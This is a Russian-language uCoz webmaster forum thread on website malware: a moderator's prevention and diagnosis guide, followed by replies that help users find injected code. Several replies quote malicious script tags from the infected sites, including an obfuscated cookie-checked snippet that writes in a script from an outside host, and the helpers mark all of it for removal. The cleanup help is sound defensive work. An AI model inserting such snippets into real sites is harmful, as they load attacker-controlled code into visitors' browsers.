|
Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
Esmo
Сообщений: 3
Сообщение # 451 |
11:18:56
09 Авг 2013
Доброго времени суток! Посмотрите пожалуйста сайт blood-ravens.ucoz.net, похоже там развелось какое зверье. Вылазит куча баннеров на тему вирусов и вэб-антивирусов. Сторонних скриптов не использовал.
|
Pup$iK
Сообщений: 308
Сообщение # 452 |
11:25:40
09 Авг 2013
Esmo, здравствуйте, из шаблонов вашего сайта необходимо удалить код:
Цитата <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>
|
Esmo
Сообщений: 3
Сообщение # 453 |
11:34:26
09 Авг 2013
Цитата (Esmo) Доброго времени суток! Посмотрите пожалуйста сайт blood-ravens.ucoz.net, похоже там развелось какое зверье. Вылазит куча баннеров на тему вирусов и вэб-антивирусов. Сторонних скриптов не использовал.
все, уже не надо, сам разобрался. нашел в шаблоне два левых скрипта.Добавлено (09 Авг 2013, 11:34:26)
---------------------------------------------
Цитата (Pup$iK) Esmo, здравствуйте, из шаблонов вашего сайта необходимо удалить код:Цитата
благодарю за внимание, именно эти строки я и нашел перед тем, как вы ответили)
|
Pup$iK
Сообщений: 308
Сообщение # 454 |
11:34:30
09 Авг 2013
Цитата (Esmo) нашел в шаблоне два левых скрипта.
только 2? Сообщение # 452
|
Esmo
Сообщений: 3
Сообщение # 455 |
11:42:57
09 Авг 2013
Цитата (Pup$iK) только 2? Сообщение # 452 Добавлено (09 Авг 2013, 11:37:56)
---------------------------------------------
о, третий попался Добавлено (09 Авг 2013, 11:42:57)
---------------------------------------------
вопрос - можно ли как-то защититься от подобных вещей?
|
webanet
Сообщений: 24067
Сообщение # 456 |
13:25:52
09 Авг 2013
|
khobotov63
Сообщений: 32
Сообщение # 457 |
21:40:09
09 Авг 2013
webanet, Здравствуйте, подскажите, пожалуйста, возможно ли на сайте от ucoz изменить адрес админки. Ведь если будет стоять не « адрес сайта /admin/» а тот,который пропишу я, то повысится безопасность, но данной функции я почему то не
нахожу.
Сообщение отредактировал khobotov63 - Пятница, 09 Авг 2013, 22:15:20
|
Djenya
Сообщений: 11
Сообщение # 458 |
23:17:08
09 Авг 2013
Добрый день. На сайте http://svalka-files.ucoz.ru находится вирус, не могу его найти. Будьте добры и подскажите где может быть вирус. Заранее все благодарен за ответ.
|
ЛПХ
Сообщений: 2
Сообщение # 459 |
23:19:01
09 Авг 2013
bandjuk, Спасибо за подсказку, удалил и надеюсь, что больше не будет такой проблемы 
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 460 |
01:16:14
10 Авг 2013
khobotov63, нет
Djenya, это может быть из-за рекламы, например этой:
<script type="text/javascript" src="http://tizermedia.topbirju.ru/main.html"></script>
|
webanet
Сообщений: 24067
Сообщение # 461 |
11:11:53
10 Авг 2013
Djenya, зачем вам это?
Код <script src="http://svalka-files.ucoz.ru/js/jquery-latest.pack.js" type="text/javascript"></script>
вирус находится тут
Код <script src="/footer/jquery.coda-bubble.sp.js" type="text/javascript"></script>
скрипт можно удалить или полностью или только вредоносную часть
Код function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>');}
далее надо удалить вот это в самом низу кода
Код <noindex><script language="javascript" src="http://uno.wt-rotator.com/?t=br&pid=10613"></script></noindex>
Код http://svalka-files.ucoz.ru/rtr/2-4
и снимите все что связано с Код http://wizard.topbirju.ru/?t=b&blockids=5852
|
strandruxa
Сообщений: 10
Сообщение # 462 |
19:51:54
10 Авг 2013
У меня на всех сайтах юкоз яндекс вебмастер ругается, причем 2 из сайтов чистые ( я их создал, ничего не добавлял/ не изменял и т.п., ждал начала индексации ). На этих двух сайтах индексация как вторую неделю пошла, я добавил в вебмастер яна и он обнаружил опасный код... Кажется, что в их рекламе вирус...
P.S. Тему наверное как обычно удалят, ничего не ответив...
|
webanet
Сообщений: 24067
Сообщение # 463 |
19:55:31
10 Авг 2013
strandruxa, нужны адреса всех сайтов на которые ругается яндекс
|
strandruxa
Сообщений: 10
Сообщение # 464 |
20:04:14
10 Авг 2013
Цитата (webanet) strandruxa, нужны адреса всех сайтов на которые ругается яндекс Добавлено (10 Авг 2013, 20:04:14)
---------------------------------------------
Цитата (webanet) strandruxa, нужны адреса всех сайтов на которые ругается яндекс
Ругается на главную страницу, хотя все на сайте стандартное.
|
bandjuk
Сообщений: 6816
Уровень замечаний:
Сообщение # 465 |
20:59:26
10 Авг 2013
strandruxa, у яндекса не пробовали выяснить что ему собственно не нравится?
|
Чат сообщества
